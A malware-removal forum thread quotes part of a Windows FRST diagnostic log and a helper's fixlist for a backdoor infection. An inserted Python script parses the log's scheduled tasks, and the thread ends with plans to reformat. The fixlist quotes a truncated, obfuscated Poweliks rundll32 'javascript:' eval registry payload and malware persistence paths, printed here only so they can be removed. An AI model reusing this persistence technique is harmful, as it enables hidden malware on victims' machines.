2012-09-05 03:50 - 2012-09-05 03:50 - 00056440 _____ () C:\Program Files (x86)\Samsung\Settings\CmdServer\HookDllPS2.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00026744 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsAPI.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00110712 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsBase.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00060536 _____ () C:\Program Files (x86)\Samsung\Settings\EasyMovieEnhancer.dll
2012-09-05 03:50 - 2012-09-05 03:50 - 00103544 _____ () C:\Program Files (x86)\Samsung\Settings\EasySettingsCmdClient.dll
2014-08-23 13:28 - 2014-08-23 13:28 - 00043008 _____ () c:\users\stephen\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzys3gw.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\Stephen\AppData\Roaming\Dropbox\bin\libcef.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00016896 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\featureController.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00062976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\osEvents.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00322048 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\log4cplus.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00400384 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\sqlite3.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00195584 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\libgsoap.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00020480 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\eventsSender.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00062464 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\zlib1.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00446976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\deviceProfile.dll
2012-12-27 19:20 - 2012-09-18 15:04 - 00064512 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\serviceManagerStarter.dll
2013-06-18 16:08 - 2013-06-18 16:08 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-05-01 16:03 - 2012-05-30 02:51 - 00699280 ____R () C:\PROGRAM FILES (X86)\NORTON INTERNET SECURITY\ENGINE\20.5.0.28\wincfi39.dll
2012-10-29 01:25 - 2012-06-25 14:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00718152 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\libglesv2.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00126280 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\libegl.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 08537928 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\pdf.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 00353096 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 01732936 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\ffmpegsumo.dll
2014-08-14 16:29 - 2014-08-06 23:20 - 14669128 _____ () C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "Intel AppUp(SM) center"
HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Norton Online Backup"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "TrojanScanner"
HKCU\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083"
HKCU\...\StartupApproved\Run: => "Dailtyqovoyxivw"
HKCU\...\StartupApproved\Run: => "Skype"
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/23/2014 01:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Faulting module name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Exception code: 0x40000015
Fault offset: 0x000000000021dbc1
Faulting process id: 0x1578
Faulting application start time: 0xGuaranaAgent.exe0
Faulting application path: GuaranaAgent.exe1
Faulting module path: GuaranaAgent.exe2
Report Id: GuaranaAgent.exe3
Faulting package full name: GuaranaAgent.exe4
Faulting package-relative application ID: GuaranaAgent.exe5
 
Error: (08/23/2014 01:21:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x0002fb1e
Faulting process id: 0x1542c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 01:12:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x2ce4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:54:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x1e48
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:17:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x0004f592
Faulting process id: 0x28c4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (08/23/2014 00:09:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Faulting module name: GuaranaAgent.exe, version: 2.0.13.0, time stamp: 0x507ad50f
Exception code: 0x40000015
Fault offset: 0x000000000021dbc1
Faulting process id: 0x1054
Faulting application start time: 0xGuaranaAgent.exe0
Faulting application path: GuaranaAgent.exe1
Faulting module path: GuaranaAgent.exe2
Report Id: GuaranaAgent.exe3
Faulting package full name: GuaranaAgent.exe4
Faulting package-relative application ID: GuaranaAgent.exe5
 
Error: (08/23/2014 10:22:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: devmonsrv.exe, version: 2.5.0.244, time stamp: 0x50220e70
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x7d4
Faulting application start time: 0xdevmonsrv.exe0
Faulting application path: devmonsrv.exe1
Faulting module path: devmonsrv.exe2
Report Id: devmonsrv.exe3
Faulting package full name: devmonsrv.exe4
Faulting package-relative application ID: devmonsrv.exe5
 
Error: (08/23/2014 09:51:49 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest1".Error in manifest or policy file "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest2" on line C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest.
Component 2: C:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifest.
 
Error: (08/23/2014 09:47:51 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest1".Error in manifest or policy file "C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest2" on line C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifest.
Component 2: C:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifest.
 
Error: (08/23/2014 08:34:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16518, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16420, time stamp: 0x505aaa82
Exception code: 0xc0000005
Fault offset: 0x00061206
Faulting process id: 0x1edbc
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
 
System errors:
=============
Error: (08/23/2014 01:27:46 PM) (Source: BugCheck) (EventID: 1001) (User: )
Description: 0x000000fc (0x0000000000160d40, 0x13c00000b3ce7867, 0xfffff8801c1438e0, 0x0000000080000005)C:\windows\MEMORY.DMP082314-36093-01
 
Error: (08/23/2014 01:27:00 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:47:00 PM on ‎8/‎23/‎2014 was unexpected.
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2967916).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2934016).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Microsoft .NET Framework 3.5 on Windows 8 and Windows Server 2012 for x64-based Systems (KB2966827).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2891804).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2877213).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Microsoft .NET Framework 3.5 on Windows 8 and Windows Server 2012 for x64-based Systems (KB2931357).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Security Update for Windows 8 for x64-based Systems (KB2939576).
 
Error: (08/23/2014 01:05:54 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x800f0922: Update for Windows 8 for x64-based Systems (KB2876415).
 
 
Microsoft Office Sessions:
=========================
Error: (08/23/2014 01:34:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: GuaranaAgent.exe2.0.13.0507ad50fGuaranaAgent.exe2.0.13.0507ad50f40000015000000000021dbc1157801cfbef86f4691a8C:\Program Files\Samsung\Support Center\GuaranaAgent.exeC:\Program Files\Samsung\Support Center\GuaranaAgent.exeb12d9793-2aeb-11e4-bee3-c48508e01671
 
Error: (08/23/2014 01:21:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c00000050002fb1e1542c01cfbef579d3af66C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dlle28504c9-2ae9-11e4-bee2-c48508e01671
 
Error: (08/23/2014 01:12:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612062ce401cfbef502296209C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dll996b3a7d-2ae8-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:54:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612061e4801cfbef289dc33d8C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dll1d0475ab-2ae6-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:17:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c00000050004f59228c401cfbeed101c3029C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dllfd3721b6-2ae0-11e4-bee2-c48508e01671
 
Error: (08/23/2014 00:09:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: GuaranaAgent.exe2.0.13.0507ad50fGuaranaAgent.exe2.0.13.0507ad50f40000015000000000021dbc1105401cfbeec932d6a34C:\Program Files\Samsung\Support Center\GuaranaAgent.exeC:\Program Files\Samsung\Support Center\GuaranaAgent.exed6046f54-2adf-11e4-bee2-c48508e01671
 
Error: (08/23/2014 10:22:29 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: devmonsrv.exe2.5.0.24450220e70unknown0.0.0.000000000c0000005000000007d401cfbe27fad27d77C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exeunknowne9622e44-2ad0-11e4-bedd-c48508e01671
 
Error: (08/23/2014 09:51:49 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifestC:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifestC:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe
 
Error: (08/23/2014 09:47:51 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: C:\windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_418c2a697189c07f.manifestC:\windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9200.16384_none_893961408605e985.manifestC:\Program Files (x86)\ESET\ESET Online Scanner\ESETSmartInstaller.exe
 
Error: (08/23/2014 08:34:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165185010888antdll.dll6.2.9200.16420505aaa82c0000005000612061edbc01cfbece29dddb84C:\Program Files\Internet Explorer\iexplore.exeC:\windows\SYSTEM32\ntdll.dllc2821544-2ac1-11e4-bedd-c48508e01671
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-3317U CPU @ 1.70GHz
Percentage of memory in use: 60%
Total physical RAM: 3797.53 MB
Available physical RAM: 1507.45 MB
Total Pagefile: 10965.53 MB
Available Pagefile: 8616.27 MB
Total Virtual: 8192 MB
Available Virtual: 8191.77 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:441.27 GB) (Free:268.96 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 5EFD3DFE)
 
Partition: GPT Partition Type.
 
========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 1786C683)
 
Partition: GPT Partition Type.
 
==================== End Of Log ============================


#4 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 24 August 2014 - 06:52 AM

Hi prefect,
 
I must give you this warning:
 
Looking through your logs, one or more of your infections has been identified as a Backdoor Trojan. These threats have backdoor functionality which allows hackers to remotely control your computer, steal critical system information, and download and execute files.
 
I highly suggest you to disconnect this PC from the Internet immediately, and if possible use a clean computer and a flash drive to transfer the programs I request for you to run. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. It would be wise to contact those same financial institutions to notify them of your situation.
 
Due to the nature of this trojan, your computer is very likely to be compromised. There is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:
 
How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 
We can still clean this machine, but I can't guarantee that it will be 100% secure afterwards. If you decide to continue cleaning this machine, follow on with the rest of the steps posted below. If you do not want to clean this machine, please let me know.
 
--------------

Going over your logs I noticed that you have µTorrent installed.

  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall µTorrent, however that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
 
If you wish to keep it, please do not use it until your computer is cleaned.

--------------

I see a number of lines in your log which are related to cracks, torrents and keygens. I shall provide this warning:
 
The practice of using keygens, hacking tools, cracking tools, warez, torrents or any pirated software is not only considered illegal activity, but it is a serious security risk which can turn a computer into a virus honeypot or zombie.
 
When you use these kinds of programs, be forewarned that some of the worst types of malware infections can be contracted and spread by visiting crack, keygen, warez and other pirated software sites. In many cases, those sites are infested with a smörgåsbord of malware and an increasing source of system infection. Those who attempt to get software for free can end up with a computer system so badly damaged that recovery is not possible, and it cannot be repaired. When that happens there is nothing you can do besides reformatting and reinstalling the OS.
 
If you want to read on then the full post is here.

--------------

We need to run a fix with FRST:

  • Press the Windows key + R on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...\Run: [Dailtyqovoyxivw] => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
HKU\S-1-5-21-421319782-3228657606-2084502403-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
C:\Users\Stephen\AppData\Roaming\Niuzdoky
2014-08-21 11:48 - 2014-08-23 13:00 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-20 16:22 - 2014-08-23 13:00 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
C:\ProgramData\MakeMarkerFile.exe
C:\Users\EasySurvey\EasySurvey.exe
C:\Users\Stephen\AppData\Roaming\Okodxice
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • Fixlog.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~
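The two "Security Center Update" tasks that FRST tagged in the Scheduled Tasks section of the log above, and that the fixlist in the previous post removes, can be picked out mechanically. The following is an added example (not code from this thread, from FRST, or from the helper) that applies the same two checks a malware-response helper makes by eye: whether FRST itself appended "<==== ATTENTION", and whether the task launches an unsigned file from a per-user profile directory such as AppData, where a machine-wide vendor install would not normally live. The sample lines are copied from the log in this thread; the function names, the `TaskEntry` class and the path heuristic are the example's own assumptions.

```python
"""Triage the "Scheduled Tasks" section of an FRST log.

Added example, not code from this thread or from FRST itself. It applies in
code the two checks a malware-response helper makes by eye on that section:
did FRST already tag the entry with "<==== ATTENTION", and does the task
launch an unsigned file from a per-user profile directory (AppData, Temp),
where a machine-wide vendor install would not normally live.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Target locations that a legitimate installer-created task rarely points at
# (heuristic chosen for this example, not an FRST rule).
PROFILE_PATH = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Temp\\", re.IGNORECASE)


@dataclass
class TaskEntry:
    name: str                      # task path under System32\Tasks, or .job name
    target: str                    # executable/command the task runs
    publisher: Optional[str]       # signer FRST printed in "(...)", if any
    frst_tagged: bool              # FRST appended "<==== ATTENTION"
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_task_line(line: str) -> Optional[TaskEntry]:
    """Parse one FRST 'Task:' line (either the {GUID} or the .job form)."""
    line = line.strip()
    if not line.startswith("Task:") or " => " not in line:
        return None
    left, right = line[len("Task:"):].split(" => ", 1)
    left = left.strip()
    m = re.search(r"System32\\Tasks\\(.+)$", left)
    name = m.group(1) if m else re.sub(r"\.job$", "", left.rsplit("\\", 1)[-1])
    tagged = "<==== ATTENTION" in right
    right = right.replace("<==== ATTENTION", "").strip()
    publisher = None
    pm = re.search(r"\s\(([^()]*)\)$", right)          # trailing "(Publisher)"
    if pm:
        publisher = pm.group(1) or None                 # "()" means no signer
        right = right[: pm.start()].rstrip()
    right = re.sub(r"\s\[\d{4}-\d{2}-\d{2}\]$", "", right)  # trailing "[date]"
    return TaskEntry(name, right, publisher, tagged)


def assess(entry: TaskEntry) -> TaskEntry:
    """Attach the reasons (if any) for treating the task as suspicious."""
    if entry.frst_tagged:
        entry.reasons.append("tagged by FRST")
    if entry.publisher is None and PROFILE_PATH.search(entry.target):
        entry.reasons.append("unsigned target in user profile")
    return entry


def triage(log_text: str) -> Dict[str, TaskEntry]:
    """Parse every Task: line, merging the {GUID} and .job entries of one task."""
    tasks: Dict[str, TaskEntry] = {}
    for line in log_text.splitlines():
        entry = parse_task_line(line)
        if entry is None:
            continue
        assess(entry)
        seen = tasks.get(entry.name)
        if seen is None:
            tasks[entry.name] = entry
            continue
        for reason in entry.reasons:
            if reason not in seen.reasons:
                seen.reasons.append(reason)
        seen.frst_tagged = seen.frst_tagged or entry.frst_tagged
        seen.publisher = seen.publisher or entry.publisher
    return tasks


def suspicious_tasks(log_text: str) -> List[str]:
    """Sorted names of tasks that tripped at least one check."""
    return sorted(n for n, t in triage(log_text).items() if t.suspicious)


# Sample lines copied from the Scheduled Tasks section of the log in this thread.
SAMPLE_LOG = r"""
Task: {0CB447B6-F6AC-4C53-9A9E-87F2CCB92AF6} - System32\Tasks\Security Center Update - 436866125 => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {1C125608-BA76-40CF-8FEA-F223DE03F06F} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2012-06-13] (Intel Corporation)
Task: {4A874836-A08E-4C6C-8941-DA85E9D89463} - System32\Tasks\Security Center Update - 406261607 => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
Task: {80BE2B4B-D4CD-46A1-9D81-F747B7AD5AF8} - System32\Tasks\Xerox PhotoCafe Communicator => C:\ProgramData\Xerox PhotoCafe\MessageCheck.exe [2011-10-26] ()
Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\windows\Tasks\Security Center Update - 406261607.job => C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe <==== ATTENTION
Task: C:\windows\Tasks\Security Center Update - 436866125.job => C:\Users\Stephen\AppData\Roaming\Okodxice\buzoup.exe <==== ATTENTION
"""

if __name__ == "__main__":
    for name, task in triage(SAMPLE_LOG).items():
        if task.suspicious:
            print(f"{name}: {task.target}  <- {', '.join(task.reasons)}")
```

Run against the sample, only the two "Security Center Update" tasks trip a check; the Xerox task, which also has no publisher, stays clean because ProgramData is deliberately left out of the profile-path heuristic, and the vendor tasks keep their publisher after the trailing "[date] (Publisher)" is stripped from the target. Merging the {GUID} and .job forms of a task matters because FRST's "<==== ATTENTION" tag only appears on the .job line.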


#5 prefect

prefect
  • Topic Starter

  • Members
  • 10 posts

Posted 24 August 2014 - 10:03 AM

Toffee,

 

Thanks for your warnings and suggestions. If the machine may be compromised beyond saving, then it would be best to just reformat and reinstall the OS as you say. I'd rather just do that and be certain rather than try and clean it and never.



#6 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 24 August 2014 - 10:13 AM

Hi prefect,

 

That is fine, and sometimes security of mind is better than worrying about the machine being possibly compromised. Let me know if you need any help with reformatting and reinstalling, otherwise I will close the topic in three days.

 

xXToffeeXx~




#7 prefect

  • Topic Starter
  • Members
  • 10 posts

Posted 24 August 2014 - 10:48 AM

Toffee,

Thank you. Any assistance you might be able to provide with the reformatting would be helpful. I have no idea where to start, and this computer has no disc drive. I'm presently backing up files.

Thanks.

#8 xXToffeeXx

    Bleepin' Polar Bear

  • Malware Response Instructor
  • 6,054 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 24 August 2014 - 01:58 PM

Hi prefect,

 

Backing up files is a good start. What make is your computer: HP, Dell, Samsung, Packard Bell, Acer, Lenovo, etc.? Also, do you know the make of your computer?

 

xXToffeeXx~




#9 xXToffeeXx

    Bleepin' Polar Bear

  • Malware Response Instructor
  • 6,054 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 28 August 2014 - 01:23 PM

Hi prefect,
 
This is a 3 day bump:
 
It has been more than 3 days since my last post.

  • Do you still need help with this?
  • If after 48 hrs you have not replied to this thread, then it will have to be closed.

xXToffeeXx~




#10 xXToffeeXx

    Bleepin' Polar Bear

  • Malware Response Instructor
  • 6,054 posts
  • Gender:Female
  • Location:The Arctic Circle

Posted 02 September 2014 - 10:33 AM

